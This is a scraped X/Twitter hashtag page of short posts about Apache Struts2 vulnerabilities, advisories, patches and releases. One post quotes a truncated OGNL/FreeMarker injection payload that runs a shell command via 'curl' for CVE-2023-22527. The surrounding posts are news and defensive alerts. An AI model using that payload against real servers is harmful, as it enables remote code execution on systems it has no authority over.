Explore tweets tagged as #struts2
@win3zz
Bipin Jitiya
4 months
Remote Code Execution in Adobe AEM Forms via CVE-2025-54253 (Struts2 DevMode misconfig: auth bypass + OGNL eval) and CVE-2025-49533 (Insecure Deserialization). Both rated critical, identified in a VDP (now patched). Original research: https://t.co/uJoFgzyDk0
3
44
233
@fofabot
FOFA
1 month
⚠️⚠️ CVE-2025-64775 : Apache Struts “File Leak” Vulnerability Threatens Disk Exhaustion 🔗FOFA Link: https://t.co/UxNi7CYuu4 🎯2.6m+ Results are found on the https://t.co/pb16tGXCUG nearly year. FOFA Query: app="Struts2" 🔖Refer: https://t.co/SptNSA6REN #OSINT #FOFA
0
5
17
@0x1ak4sh
Akash Kumar
2 years
🛡️365 Days of Hacking🛡️ 🔒 Day [159] 🧩 Machine: [Stratosphere-HTB] 🌟 Difficulty: [Medium] 🔍 Summary: [Vulnerable to Apache Struts2 S2-045, got command execution. Found user creds in MySQL DB and logged in via SSH. Python library hijacking on a file with sudo access.]
0
0
21
@Anastasis_King
Cybersecurity by CyberKid
1 year
Vulnerability Analysis Tools 🔬 🔹httpX - httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp library. 🔗 https://t.co/B4BpPZr35o 🔹Struts-Scan - Struts2 vulnerability detection and utilization tools.
0
0
0
@t_nihonmatsu
二本松哲也
1 year
最近発見されたApache Struts2に関連するファイルアップロード脆弱性(CVE-2024-53677およびCVE-2023-50164)について ディレクトリトラバーサル攻撃を通じてファイルをアップロードできる可能性があり、RCEが可能になる場合があります。特に、Webシェルがルートにアップロードされると危険です。
1
3
20
@kinyuka
Kanatoko
19 days
まぁユーザ入力をポンポン気軽にプロパティに設定しちゃう作りを組み込む時点でセキュリティ意識はアレか… Struts2の https://t.co/B4PVOeqwDx.bazがsetterになったりgetterになったりするのとルイージしてるね
0
4
7
@alpha_pz
A-pZ|ぢつにんさん(カピバラのすがた)
1 year
Struts2は、 2.0 2.1 2.2 2.3 2.5 2.6→6.0 7.0 の順ですね
1
8
10
@catc0n
Caitlin Condon
1 year
Rapid7 analysis of Apache #Struts2 CVE-2024-53677 below via @the_emmons. Very similar to Struts CVE-2023-50164 — payloads have to be customized to the target and unsuccessful exploit attempts are being incorrectly interpreted as exploitation in the wild.
1
20
44
@alpha_pz
A-pZ|ぢつにんさん(カピバラのすがた)
1 year
mixi2がいけるならStruts2もいけんだろ
2
5
11
@M_haggis
The Haag™
2 years
Tracking CVE-2023-22527 and caught this nice post yesterday - label='%2b#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(#parameters.x,{})%2b'&x=(new freemarker.template.utility.Execute()).exec({"curl
0
3
4
@gothburz
Peter Girnus 🦅
1 year
Apache Struts2 文件上传逻辑绕过(CVE-2024-53677)(S2-067)
0
0
1
@lukaszlenart
Lukasz Lenart
24 days
Struts2 JQuery Plugin version 6.0.3 is out - pure dependency update release :) https://t.co/fb0XKKREwh #struts #jquery #plugin #release
0
1
2
@abhaybhargav
Abhay Bhargav
2 years
Struts2 is the gift that keeps giving https://t.co/6E13WfV6i5
0
2
8
@akaclandestine
Clandestine
1 year
Apache Struts2 文件上传逻辑绕过(CVE-2024-53677)(S2-067)
0
3
9
@socradar
SOCRadar®
1 year
🚨Exploit attempts leverage #PoC for #Apache #Struts2 CVE-2024-53677. #RCE risk from path traversal as attackers upload files like exploit.jsp to find vulnerable systems. Affected: #Struts < 6.4.0. 🔍 Stay ahead with SOCRadar’s Vulnerability Intelligence: https://t.co/NT7oUGwcRx
0
0
1
@alpha_pz
A-pZ|ぢつにんさん(カピバラのすがた)
9 months
Switch2の抽選の話題で持ち切りですが、 Struts2 (7.0.3) は 3/3 にリリースされてました https://t.co/wsRDCqfFrS
0
2
5
@redhotcyber
Red Hot Cyber
1 year
0
0
0
@ASDGovAu
Australian Signals Directorate
1 year
! ALERT ! A critical vulnerability has been found in Apache Struts2 impacting versions below 6.4.0 (CVE-2024-53677). Affected organisations and users are encouraged to apply available patches and workarounds as soon as possible. Read the alert at https://t.co/ygddM1tpoq
0
7
10
@k12u
k12u as a Service w/👦
22 days
2025年末にStruts2みたいな脆弱性に対応する悲哀
@bulkneets
mala
22 days
react2shell、JSONがある言語でデシリアライズ起因のRCEが起きたことを深刻に受け止めるべき。単に実装のバグでRSC自体の思想や設計の問題ではないといった擁護も良く見るが、これが設計ミスや思考のエラーでなくてなんだというのだろう。現実見ろ、理想目指した実験作なら実戦投入するな、目を覚ませ
0
2
8